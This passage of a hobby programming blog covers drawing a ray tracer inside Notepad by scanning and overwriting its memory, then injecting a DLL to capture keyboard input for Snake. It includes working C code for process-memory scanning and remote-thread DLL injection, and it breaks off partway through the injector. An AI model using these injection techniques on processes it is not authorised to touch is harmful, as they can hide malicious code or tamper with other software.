<span class="kt">size_t</span> <span class="n">curPos</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
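<span class="k">while</span> <span class="p">(</span><span class="n">curPos</span> <span class="o">+</span> <span class="n">patternLen</span> <span class="o"><=</span> <span class="n">srcLen</span><span class="p">){</span> <span class="c1">//stop once the pattern no longer fits, so memcmp never reads past src</span>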
<span class="k">if</span> <span class="p">(</span><span class="n">memcmp</span><span class="p">(</span><span class="n">cur</span><span class="p">,</span> <span class="n">pattern</span><span class="p">,</span> <span class="n">patternLen</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">){</span>
<span class="k">return</span> <span class="n">cur</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">curPos</span><span class="o">++</span><span class="p">;</span>
<span class="n">cur</span> <span class="o">=</span> <span class="o">&</span><span class="n">src</span><span class="p">[</span><span class="n">curPos</span><span class="p">];</span>
<span class="p">}</span>
<span class="k">return</span> <span class="n">nullptr</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>If FindPattern() returned a match pointer, its address needed to be converted to the address of the same bit of memory in the target process’ address space. To do that, I subtracted the starting address of the local buffer from the address that was returned from FindPattern to get an offset, and then added that to the base address of the memory chunk in the target process. You can see this below.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">char</span><span class="o">*</span> <span class="nf">FindBytePatternInProcessMemory</span><span class="p">(</span><span class="n">HANDLE</span> <span class="n">process</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">pattern</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">patternLen</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">MEMORY_BASIC_INFORMATION</span> <span class="n">memInfo</span><span class="p">;</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">basePtr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">;</span>
<span class="k">while</span> <span class="p">(</span><span class="n">VirtualQueryEx</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">basePtr</span><span class="p">,</span> <span class="o">&</span><span class="n">memInfo</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">MEMORY_BASIC_INFORMATION</span><span class="p">))){</span>
<span class="k">const</span> <span class="n">DWORD</span> <span class="n">mem_commit</span> <span class="o">=</span> <span class="mh">0x1000</span><span class="p">;</span>
<span class="k">const</span> <span class="n">DWORD</span> <span class="n">page_readwrite</span> <span class="o">=</span> <span class="mh">0x04</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">memInfo</span><span class="p">.</span><span class="n">State</span> <span class="o">==</span> <span class="n">mem_commit</span> <span class="o">&&</span> <span class="n">memInfo</span><span class="p">.</span><span class="n">Protect</span> <span class="o">==</span> <span class="n">page_readwrite</span><span class="p">){</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">remoteMemRegionPtr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">memInfo</span><span class="p">.</span><span class="n">BaseAddress</span><span class="p">;</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">localCopyContents</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">malloc</span><span class="p">(</span><span class="n">memInfo</span><span class="p">.</span><span class="n">RegionSize</span><span class="p">);</span>
<span class="n">SIZE_T</span> <span class="n">bytesRead</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">ReadProcessMemory</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">memInfo</span><span class="p">.</span><span class="n">BaseAddress</span><span class="p">,</span> <span class="n">localCopyContents</span><span class="p">,</span> <span class="n">memInfo</span><span class="p">.</span><span class="n">RegionSize</span><span class="p">,</span> <span class="o">&</span><span class="n">bytesRead</span><span class="p">)){</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">match</span> <span class="o">=</span> <span class="n">FindPattern</span><span class="p">(</span><span class="n">localCopyContents</span><span class="p">,</span> <span class="n">memInfo</span><span class="p">.</span><span class="n">RegionSize</span><span class="p">,</span> <span class="n">pattern</span><span class="p">,</span> <span class="n">patternLen</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">match</span><span class="p">){</span>
<span class="kt">uint64_t</span> <span class="n">diff</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">match</span> <span class="o">-</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)(</span><span class="n">localCopyContents</span><span class="p">);</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">processPtr</span> <span class="o">=</span> <span class="n">remoteMemRegionPtr</span> <span class="o">+</span> <span class="n">diff</span><span class="p">;</span>
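<span class="n">free</span><span class="p">(</span><span class="n">localCopyContents</span><span class="p">);</span> <span class="c1">//don't leak the local copy on the success path</span>
<span class="k">return</span> <span class="n">processPtr</span><span class="p">;</span>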
<span class="p">}</span>
<span class="p">}</span>
<span class="n">free</span><span class="p">(</span><span class="n">localCopyContents</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">basePtr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">memInfo</span><span class="p">.</span><span class="n">BaseAddress</span> <span class="o">+</span> <span class="n">memInfo</span><span class="p">.</span><span class="n">RegionSize</span><span class="p">;</span>
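<span class="p">}</span>
<span class="k">return</span> <span class="n">nullptr</span><span class="p">;</span> <span class="c1">//pattern wasn't found in any committed, read/write region</span>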
<span class="p">}</span></code></pre></figure>
<p>If you want to see a working example of this, check out the “MemoryScanner” project in <a href="https://github.com/khalladay/render-with-notepad/tree/master/Render-With-Notepad/MemoryScanner">the github repo</a> that accompanies this blog post. Try it on Notepad! (it hasn’t been tried on anything else, so ymmv).</p>
<h3 id="using-utf-16-byte-patterns">Using UTF-16 Byte Patterns</h3>
<p>Remember from earlier that Notepad stores its on screen text buffer as UTF-16 data, so the byte pattern that gets fed to FindBytePatternInProcessMemory() also has to be UTF-16. For simple ASCII strings, this just involves adding a zero byte after every character. The MemoryScanner project in github does this for you:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="c1">//convert input string to UTF16 (hackily)</span>
<span class="k">const</span> <span class="kt">size_t</span> <span class="n">patternLen</span> <span class="o">=</span> <span class="n">strlen</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">]);</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">pattern</span> <span class="o">=</span> <span class="n">new</span> <span class="kt">char</span><span class="p">[</span><span class="n">patternLen</span><span class="o">*</span><span class="mi">2</span><span class="p">];</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">patternLen</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">){</span>
<span class="n">pattern</span><span class="p">[</span><span class="n">i</span><span class="o">*</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">][</span><span class="n">i</span><span class="p">];</span>
<span class="n">pattern</span><span class="p">[</span><span class="n">i</span><span class="o">*</span><span class="mi">2</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
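<p>One detail that is easy to miss is that the widened pattern is twice as long in bytes as the input string, so that doubled length is presumably what the scanner needs to receive. Below is a minimal plain C sketch of the same conversion that reports the byte length explicitly. The helper name <code>ascii_to_utf16le</code> is hypothetical, and it assumes ASCII-only input and little-endian UTF-16, which matches the zero-byte-after-each-character layout described above.</p>

```c
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper: widens an ASCII string into UTF-16LE bytes (no terminator).
   On success returns a malloc'd buffer and stores its size in bytes in *outLen;
   the caller frees it. Returns NULL if allocation fails or a non-ASCII byte is seen. */
char* ascii_to_utf16le(const char* text, size_t* outLen)
{
    size_t n = strlen(text);
    char* buf = (char*)malloc(n * 2 + 1); /* +1 so an empty string still allocates */
    if (!buf) return NULL;
    for (size_t i = 0; i < n; ++i) {
        /* Anything above 0x7F would need real UTF-8 decoding, which this sketch skips. */
        if ((unsigned char)text[i] > 0x7F) { free(buf); return NULL; }
        buf[i * 2] = text[i];     /* low byte: the ASCII code */
        buf[i * 2 + 1] = 0x00;    /* high byte: always zero for ASCII */
    }
    *outLen = n * 2;
    return buf;
}
```

<p>The value stored in <code>*outLen</code> is the length to use when comparing against memory, since the comparison works in bytes rather than characters.</p>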
<h2 id="updating-and-redrawing-notepads-edit-control">Updating and Redrawing Notepad’s Edit Control</h2>
<p>Once I had the address of the displayed text buffer in Notepad, the next step was to use <a href="https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-writeprocessmemory">WriteProcessMemory</a> to modify it. Writing code for that was trivial, but I quickly learned that just writing to the text buffer wasn’t enough to make Notepad redraw its Edit control.</p>
<p>Luckily the Win32 API has my back on this, and provides the <a href="https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-invalidaterect">InvalidateRect</a> function to force a control to redraw itself.</p>
<p>All together, modifying the displayed text in Notepad looked something like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">UpdateText</span><span class="p">(</span><span class="n">HANDLE</span> <span class="n">process</span><span class="p">,</span> <span class="n">HWND</span> <span class="n">editWindow</span><span class="p">,</span> <span class="kt">char</span><span class="o">*</span> <span class="n">notepadTextBuffer</span><span class="p">,</span> <span class="kt">char</span><span class="o">*</span> <span class="n">replacementTextBuffer</span><span class="p">,</span> <span class="kt">int</span> <span class="n">len</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">size_t</span> <span class="n">written</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">WriteProcessMemory</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">notepadTextBuffer</span><span class="p">,</span> <span class="n">replacementTextBuffer</span><span class="p">,</span> <span class="n">len</span><span class="p">,</span> <span class="o">&</span><span class="n">written</span><span class="p">);</span>
<span class="n">RECT</span> <span class="n">r</span><span class="p">;</span>
<span class="n">GetClientRect</span><span class="p">(</span><span class="n">editWindow</span><span class="p">,</span> <span class="o">&</span><span class="n">r</span><span class="p">);</span>
<span class="n">InvalidateRect</span><span class="p">(</span><span class="n">editWindow</span><span class="p">,</span> <span class="o">&</span><span class="n">r</span><span class="p">,</span> <span class="nb">false</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<h2 id="from-memory-scanner-to-renderer">From Memory Scanner to Renderer</h2>
<p>The gap between a working memory scanner and a full-fledged Notepad renderer is surprisingly small. There were only three issues that needed to be sorted out to go from what I’ve described so far to the ray tracer teased at the beginning of this post.</p>
<p>These issues were:</p>
<ul>
<li>I needed to control the size of the Notepad window</li>
<li>I still couldn’t expand the size of the on screen text buffer</li>
<li>My memory scanner didn’t handle duplicate byte patterns.</li>
</ul>
<p>The first issue wasn’t much of a problem on its own. It was trivial to add a call to <a href="https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-movewindow">MoveWindow</a>, but I included it in the list because this was an important part of how I approached the next issue on the list.</p>
<p>I ended up hard coding the size I wanted my Notepad window to be, and then counted how many characters (of a monospace font) it would take to exactly fill a window of that size. Then after calling MoveWindow, I pre-allocated the on screen text buffer by sending that many WM_CHAR messages to Notepad. This felt like cheating, but the good kind of cheating.</p>
<p>To make sure that I always had a unique byte pattern to search for, I just randomized which chars I sent in the WM_CHAR messages.</p>
<p>I’ve included what this might look like in code. The actual code in the github repo is formatted a little bit differently, but works the same way.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">PreallocateTextBuffer</span><span class="p">(</span><span class="n">DWORD</span> <span class="n">processId</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">HWND</span> <span class="n">editWindow</span> <span class="o">=</span> <span class="n">GetWindowForProcessAndClassName</span><span class="p">(</span><span class="n">processId</span><span class="p">,</span> <span class="s">"Edit"</span><span class="p">);</span>
<span class="c1">// it takes 131 * 30 chars to fill a 1365x768 window with Consolas (size 11) chars</span>
<span class="n">MoveWindow</span><span class="p">(</span><span class="n">instance</span><span class="p">.</span><span class="n">topWindow</span><span class="p">,</span> <span class="mi">100</span><span class="p">,</span> <span class="mi">100</span><span class="p">,</span> <span class="mi">1365</span><span class="p">,</span> <span class="mi">768</span><span class="p">,</span> <span class="nb">true</span><span class="p">);</span>
<span class="kt">size_t</span> <span class="n">charCount</span> <span class="o">=</span> <span class="mi">131</span> <span class="o">*</span> <span class="mi">30</span><span class="p">;</span>
<span class="kt">size_t</span> <span class="n">utf16BufferSize</span> <span class="o">=</span> <span class="n">charCount</span> <span class="o">*</span> <span class="mi">2</span><span class="p">;</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">frameBuffer</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">malloc</span><span class="p">(</span><span class="n">utf16BufferSize</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">charCount</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">){</span>
<span class="kt">char</span> <span class="n">v</span> <span class="o">=</span> <span class="mh">0x41</span> <span class="o">+</span> <span class="p">(</span><span class="n">rand</span><span class="p">()</span> <span class="o">%</span> <span class="mi">26</span><span class="p">);</span>
<span class="n">PostMessage</span><span class="p">(</span><span class="n">editWindow</span><span class="p">,</span> <span class="n">WM_CHAR</span><span class="p">,</span> <span class="n">v</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="n">frameBuffer</span><span class="p">[</span><span class="n">i</span> <span class="o">*</span> <span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="n">v</span><span class="p">;</span>
<span class="n">frameBuffer</span><span class="p">[</span><span class="n">i</span> <span class="o">*</span> <span class="mi">2</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x00</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">Sleep</span><span class="p">(</span><span class="mi">5000</span><span class="p">);</span> <span class="c1">//wait for input messages to finish processing...it's slow. </span>
<span class="c1">//Now use the frameBuffer as the unique byte pattern to search for</span>
<span class="p">}</span></code></pre></figure>
<p>What this meant for the end product is that immediately after starting, I had to watch my Notepad window slowly fill up with random characters, before I could acquire the text buffer pointer and clear the screen.</p>
<div align="center">
<img src="/images/post_images/2020-05-20/init.gif" />
<br /><br />
</div>
<p>All of the above relies on using a known font face and font size in order to work right. I was going to add some code to force Notepad to use the font I wanted (Consolas, 11pt), but for some reason sending WM_SETFONT messages kept messing up how fonts were displaying, and I didn’t feel like figuring out what was going wrong there. Consolas 11pt was the default Notepad font on my system, which was good enough for me.</p>
<h2 id="ray-tracing-in-notepad">Ray Tracing In Notepad</h2>
<p>Explaining how to build a ray tracer is well beyond the scope of what I want to talk about in this post. If you’re unfamiliar with ray tracing in general, head over to <a href="https://www.scratchapixel.com/">ScratchAPixel</a> and learn you some ray tracing for great good. What I want to finish off this post with is a quick discussion of the nuts and bolts of hooking a ray tracer up to all the stuff I just talked about.</p>
<p>It probably makes sense to start off with the frame buffers. In order to minimize the number of WriteProcessMemory calls (both for sanity and performance), I allocated a ray-tracer-local buffer that was the same size as Notepad’s text buffer (number of characters * 2 (because UTF16)). All the rendering calculations would write to this local buffer until the end of the frame, when I used a single WriteProcessMemory call to replace the entire contents of Notepad’s buffer at once. This led to a really simple set of functions for drawing:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">drawChar</span><span class="p">(</span><span class="kt">int</span> <span class="n">x</span><span class="p">,</span> <span class="kt">int</span> <span class="n">y</span><span class="p">,</span> <span class="kt">char</span> <span class="n">c</span><span class="p">);</span> <span class="c1">//local buffer</span>
<span class="kt">void</span> <span class="nf">clearScreen</span><span class="p">();</span> <span class="c1">// local buffer</span>
<span class="kt">void</span> <span class="nf">swapBuffersAndRedraw</span><span class="p">();</span> <span class="c1">// pushes changes and refreshes screen. </span></code></pre></figure>
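<p>For a rough idea of what the two local-buffer functions might look like, here is a minimal sketch. It assumes the buffer is a flat, row-major array of UTF-16 code units with no line terminators, sized to the 131 x 30 render target; the localBuffer name and the bounds check are my own additions for illustration, not necessarily what the real project does. swapBuffersAndRedraw() is left out because it depends on WriteProcessMemory and a handle to Notepad.</p>

```c
#include <stdint.h>

#define SCREEN_CHARS_WIDE 131
#define SCREEN_CHARS_TALL 30
#define SCREEN_CHARS (SCREEN_CHARS_WIDE * SCREEN_CHARS_TALL)

/* One UTF-16 code unit per character cell (assumed layout: row-major, no newlines). */
static uint16_t localBuffer[SCREEN_CHARS];

/* Fill the local buffer with spaces; nothing is sent to Notepad here. */
void clearScreen(void)
{
    for (int i = 0; i < SCREEN_CHARS; ++i)
    {
        localBuffer[i] = (uint16_t)' ';
    }
}

/* Write one character into the local buffer, ignoring out-of-range cells. */
void drawChar(int x, int y, char c)
{
    if (x < 0 || x >= SCREEN_CHARS_WIDE || y < 0 || y >= SCREEN_CHARS_TALL)
    {
        return;
    }
    localBuffer[y * SCREEN_CHARS_WIDE + x] = (uint16_t)(unsigned char)c;
}
```

<p>With something like this in place, a frame is just clearScreen(), a drawChar() call per cell, and then one bulk copy of localBuffer (SCREEN_CHARS * 2 bytes) into the remote process.</p>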
<p>On the ray tracing side, given the low resolution of my render target (131 x 30), I had to keep things very simple, since there just weren’t enough “pixels” to display fine detail nicely. I ended up tracing only a single primary ray and a single shadow ray for each pixel being rendered to, and I thought about ditching the shadows until I found a nice grayscale float to ascii color ramp <a href="http://paulbourke.net/dataformats/asciiart/">on Paul Bourke’s website</a>. Having such a low complexity scene and small render surface also meant that I didn’t end up needing to parallelize the rendering at all.</p>
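<p>Mapping a grayscale float onto a character ramp boils down to scaling and rounding. The sketch below assumes brightness is in the range 0 to 1 and uses the short 10-level ramp from that page; which ramp the real project uses, and the brightnessToChar name, are assumptions on my part.</p>

```c
#include <string.h>

/* Short 10-level ramp, ordered from darkest to brightest. */
static const char RAMP[] = " .:-=+*#%@";

/* Convert a brightness in [0, 1] to the nearest ramp character. */
char brightnessToChar(float brightness)
{
    if (brightness < 0.0f) brightness = 0.0f;
    if (brightness > 1.0f) brightness = 1.0f;

    int levels = (int)strlen(RAMP);
    /* Scale to [0, levels - 1] and round to the nearest index. */
    int index = (int)(brightness * (float)(levels - 1) + 0.5f);
    return RAMP[index];
}
```

<p>A pixel in shadow just ends up with a lower brightness, so it lands on one of the sparser characters near the start of the ramp.</p>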
<p>I also ran into some issues getting things to look right due to characters being taller than they are wide. In the end, I “fixed” this by halving the width value I used in my aspect ratio calculations.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">float</span> <span class="n">aspect</span> <span class="o">=</span> <span class="p">(</span><span class="mi">0</span><span class="p">.</span><span class="mi">5</span><span class="n">f</span> <span class="o">*</span> <span class="n">SCREEN_CHARS_WIDE</span><span class="p">)</span> <span class="o">/</span> <span class="kt">float</span><span class="p">(</span><span class="n">SCREEN_CHARS_TALL</span><span class="p">);</span></code></pre></figure>
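<p>To show where that aspect value ends up, here is a sketch of the usual way to turn a character cell into a point on the image plane for a primary ray. The camera setup (image plane one unit in front of the camera, a tanHalfFov parameter) and the cellToCameraSpace name are assumptions for illustration, since the actual camera code isn’t shown in this post.</p>

```c
#define SCREEN_CHARS_WIDE 131
#define SCREEN_CHARS_TALL 30

/* Map the centre of a character cell to camera-space x/y on an image plane
   one unit in front of the camera. tanHalfFov is tan(verticalFov / 2). */
void cellToCameraSpace(int col, int row, float tanHalfFov, float* outX, float* outY)
{
    /* Halving the width compensates for cells being roughly twice as tall as wide. */
    float aspect = (0.5f * SCREEN_CHARS_WIDE) / (float)SCREEN_CHARS_TALL;

    float u = ((float)col + 0.5f) / (float)SCREEN_CHARS_WIDE; /* 0..1, left to right */
    float v = ((float)row + 0.5f) / (float)SCREEN_CHARS_TALL; /* 0..1, top to bottom */

    *outX = (2.0f * u - 1.0f) * aspect * tanHalfFov;
    *outY = (1.0f - 2.0f * v) * tanHalfFov;
}
```

<p>With 131 x 30 cells the halved aspect works out to about 2.18, instead of the 4.37 you would get from the raw character counts.</p>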
<p>The one remaining problem that I haven’t found a workable solution for is that updating the contents of Notepad’s edit control so frequently causes a very noticeable flicker. I tried a bunch of different things to get rid of this, including trying to double buffer the edit control by allocating twice the number of characters and using WM_VSCROLL messages to “swap” the buffer by adjusting the scroll bar position. Unfortunately nothing I tried worked, and the flicker remains.</p>
<h2 id="part-2-input-boogaloo-is-available-now">Part 2: Input Boogaloo is Available Now!</h2>
<p>The next (and final) part of my quest to make a real-time game in Notepad was to figure out how to handle user input. If you’ve gotten this far and are thirsty for more, the next post is <a href="/blog/2020/05/20/Hooking-Input-Snake-In-Notepad.html">available here</a>!</p>
Hooking Keyboard Input To Play Snake In Notepad.exe2020-05-20T00:00:00+00:00http://kylehalladay.com/blog/2020/05/20/Hooking-Input-Snake-In-Notepad<style>
.collapsible {
padding: 10px;
background-color: #F5F5F5;
border-style: solid;
border-color: #333333;
border-width: 2px;
}
.collapsewrapper2 {
padding: 0px 0px 18px 0px;
}
</style>
<p>This is the second (and last) post about my quest to make a real-time game playable in stock Notepad.exe. In <a href="/blog/2020/05/20/Rendering-With-Notepad.html">the previous article</a>, I talked through using a quick and dirty memory scanner to get access to Notepad’s on-screen text buffer (and build a ray tracer that rendered into it). In this post I’m going to talk about how I handled getting user input, and finally ended up at a fully playable Snake game in stock Notepad.</p>
<div align="center">
<img src="/images/post_images/2020-05-20/snake3.gif" />
<font size="2">The flickering problem from last time is still very not-fixed</font>
<br /><br />
</div>
<h2 id="babys-first-dll-injection">Baby’s First DLL Injection</h2>
<p>The title of this post gives away the fact that I ended up using hooks to capture user input, but I originally thought I could do it with just DLL injection instead. I barely knew what DLL injection was, but I knew it could cause things to happen in an already running process. This seemed like a decent place to start. As it turns out, you need to understand DLL injection to work with hooks anyway, so it’s not a bad spot to start this blog post too.</p>
<p>I started by googling the hell out of “DLL injection,” and found <a href="http://deniable.org/windows/inject-all-the-things">this excellent article</a> that breaks down what DLL Injection is and has a great <a href="https://github.com/fdiskyou/injectAllTheThings">github repo</a> with examples of different ways to go about it. I didn’t have a clue about how I was going to use any of this to capture keyboard input, but I figured I’d try to inject something simple into a running Notepad process anyway.</p>
<p>Based on the injection article I just linked, the easiest way to inject a dll seems to be:</p>
<ul>
<li>Create a DLL that performs some action in dllmain when it is loaded</li>
<li>Open a handle (“attach”) to a running process</li>
<li>Allocate some memory in that process’ address space, and write the path to the DLL into it</li>
<li>Start a thread in that process that calls LoadLibrary with that path, which loads the DLL into the process</li>
<li>When it loads, that DLL does the stuff in dllmain</li>
</ul>
<p>Writing a DLL that does something in dllmain() is really easy if you aren’t doing a whole lot with it. I found later on that there’s a whole lot of stuff that you can’t do in dllmain (more info <a href="https://docs.microsoft.com/en-us/windows/win32/dlls/dllmain">here</a>), but for my first test project I just popped open a message box. The entire code for the DLL payload was just a few lines.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="c1">//a small dll payload that spawns a message box in whatever process loads the dll</span>
<span class="cp">#define WIN32_LEAN_AND_MEAN
#include <windows.h>
</span>
<span class="n">BOOL</span> <span class="n">WINAPI</span> <span class="nf">DllMain</span><span class="p">(</span><span class="n">HINSTANCE</span> <span class="n">hinstDLL</span><span class="p">,</span> <span class="n">DWORD</span> <span class="n">ul_reason_for_call</span><span class="p">,</span> <span class="n">LPVOID</span> <span class="n">lpvReserved</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">switch</span> <span class="p">(</span><span class="n">ul_reason_for_call</span><span class="p">){</span>
<span class="k">case</span> <span class="n">DLL_PROCESS_ATTACH</span><span class="p">:</span>
<span class="n">MessageBox</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="s">"Process attach!"</span><span class="p">,</span> <span class="s">"Woohoo"</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="k">break</span><span class="p">;</span>
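<span class="p">}</span>
<span class="k">return</span> <span class="n">TRUE</span><span class="p">;</span> <span class="c1">//DllMain has to return a value; TRUE tells the loader that initialization succeeded</span>
<span class="p">}</span></code></pre></figure>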
<p>The tricky part, as you might imagine, was getting Notepad to load this in the first place. Just like the above payload, my injection code was almost entirely copied from the <a href="https://github.com/fdiskyou/injectAllTheThings">InjectAllTheThings repo</a> I linked above. Unlike the payload, it’s a lot longer. I’m including it here because if you’ve never seen how to do this before, I assume this will be more convenient than having to click a link to github, but I’m not going to dive into how it works because the article/repo I linked above can teach you about it a whole lot better than I can.</p>
<div class="collapsewrapper2">
<details class="collapsible">
<summary>Full DLL Injection Code (click to expand)</summary>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="c1">//Injector_LoadLibrary is a dll injector that uses LoadLibraryA to inject a dll into a running process</span>
<span class="c1">// usage: Injector_LoadLibrary <process name> <path to dll> </span>
<span class="cp">#include <stdio.h>
#include <string.h> //for strlen and strcmp
#include <Windows.h>
#include <TlHelp32.h> //for PROCESSENTRY32, needs to be included after windows.h
</span>
<span class="kt">void</span> <span class="nf">printHelp</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Injector_LoadLibrary</span><span class="se">\n</span><span class="s">Usage: Injector_LoadLibrary <process name> <path to dll></span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">createRemoteThread</span><span class="p">(</span><span class="n">DWORD</span> <span class="n">processID</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">dllPath</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">HANDLE</span> <span class="n">handle</span> <span class="o">=</span> <span class="n">OpenProcess</span><span class="p">(</span>
<span class="n">PROCESS_QUERY_INFORMATION</span> <span class="o">|</span> <span class="c1">//Needed to get a process' token</span>
<span class="n">PROCESS_CREATE_THREAD</span> <span class="o">|</span> <span class="c1">//for obvious reasons</span>
<span class="n">PROCESS_VM_OPERATION</span> <span class="o">|</span> <span class="c1">//required to perform operations on address space of process (like WriteProcessMemory)</span>
<span class="n">PROCESS_VM_WRITE</span><span class="p">,</span> <span class="c1">//required for WriteProcessMemory</span>
<span class="n">FALSE</span><span class="p">,</span> <span class="c1">//don't inherit handle</span>
<span class="n">processID</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">handle</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Could not open process with pid: %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">processID</span><span class="p">);</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//once the process is open, we need to write the name of our dll to that process' memory</span>
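<span class="kt">size_t</span> <span class="n">dllPathLen</span> <span class="o">=</span> <span class="n">strlen</span><span class="p">(</span><span class="n">dllPath</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span> <span class="c1">//+1 so the null terminator gets copied too</span>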
<span class="kt">void</span><span class="o">*</span> <span class="n">dllPathRemote</span> <span class="o">=</span> <span class="n">VirtualAllocEx</span><span class="p">(</span>
<span class="n">handle</span><span class="p">,</span>
<span class="nb">NULL</span><span class="p">,</span> <span class="c1">//let the system decide where to allocate the memory</span>
<span class="n">dllPathLen</span><span class="p">,</span>
<span class="n">MEM_COMMIT</span><span class="p">,</span> <span class="c1">//actually commit the virtual memory</span>
<span class="n">PAGE_READWRITE</span><span class="p">);</span> <span class="c1">//mem access for committed page</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">dllPathRemote</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Could not allocate %zu bytes in process with pid: %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">dllPathLen</span><span class="p">,</span> <span class="n">processID</span><span class="p">);</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">BOOL</span> <span class="n">writeSucceeded</span> <span class="o">=</span> <span class="n">WriteProcessMemory</span><span class="p">(</span>
<span class="n">handle</span><span class="p">,</span>
<span class="n">dllPathRemote</span><span class="p">,</span>
<span class="n">dllPath</span><span class="p">,</span>
<span class="n">dllPathLen</span><span class="p">,</span>
<span class="nb">NULL</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">writeSucceeded</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Could not write %zu bytes to process with pid %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">dllPathLen</span><span class="p">,</span> <span class="n">processID</span><span class="p">);</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//now get address of LoadLibraryA function inside Kernel32.dll</span>
